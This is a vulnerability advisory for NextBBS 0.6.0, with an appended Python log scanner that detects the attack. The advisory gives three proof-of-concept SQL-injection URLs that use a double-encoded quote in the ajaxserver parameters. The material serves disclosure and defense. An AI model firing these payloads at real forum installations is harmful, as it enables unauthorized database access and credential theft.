source: https://www.securityfocus.com/bid/52728/info
NextBBS is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and an authentication-bypass vulnerability.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and bypass the authentication process to gain unauthorized access to the system.
NextBBS 0.6.0 is vulnerable; other versions may also be affected.
http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe
http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=isidavailable&id=war%2527axe
http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=getgreetings&username=war%2527axe
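
Added example, not part of the original advisory: the sample URLs carry `%2527`, which percent-decodes to `%27` and only on a second pass to a single quote, so a check applied after one decoding pass sees no quote. The Python below scans access-log lines for that double encoding in the three parameters shown above; the combined log format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# action -> parameter, taken from the three sample URLs on this page.
WATCHED = {"findusers": "curstr", "isidavailable": "id", "getgreetings": "username"}
MAX_PASSES = 4  # assumption: upper bound on nested encoding layers worth peeling
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # assumes combined log format

def quote_depth(raw, max_passes=MAX_PASSES):
    """Number of percent-decoding passes before a single quote appears (0 = never)."""
    value = raw
    for depth in range(1, max_passes + 1):
        value = unquote(value)
        if "'" in value:
            return depth
    return 0

def inspect_request(target):
    """Return (action, param, depth) when a watched parameter hides a quote
    behind more than one encoding layer, else None."""
    query = urlsplit(target).query
    # Keep the raw, still-encoded values so the layers can be counted.
    raw = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    if raw.get("do") != "ajaxserver":
        return None
    param = WATCHED.get(raw.get("action", ""))
    if param is None or param not in raw:
        return None
    depth = quote_depth(raw[param])
    return (raw["action"], param, depth) if depth >= 2 else None

def scan(lines):
    """Return a list of (line_number, action, param, depth) for flagged requests."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        hit = inspect_request(match.group(1)) if match else None
        if hit:
            hits.append((number, *hit))
    return hits

# Constructed log lines for illustration; addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2012:10:00:01 +0000] "GET /nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe HTTP/1.1" 200 512',
    '192.0.2.11 - - [12/Mar/2012:10:00:05 +0000] "GET /nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=waraxe HTTP/1.1" 200 498',
    '192.0.2.12 - - [12/Mar/2012:10:00:09 +0000] "GET /nextbbs.0.6.0/?do=ajaxserver&action=getgreetings&username=o%27brien HTTP/1.1" 200 77',
    '192.0.2.10 - - [12/Mar/2012:10:00:12 +0000] "GET /nextbbs.0.6.0/?do=ajaxserver&action=isidavailable&id=war%2527axe HTTP/1.1" 200 31',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A depth of 1 (a quote behind ordinary single encoding, as in the third sample line) is left unflagged here because it also occurs in legitimate values; lower the threshold in `inspect_request` if those should be reviewed too.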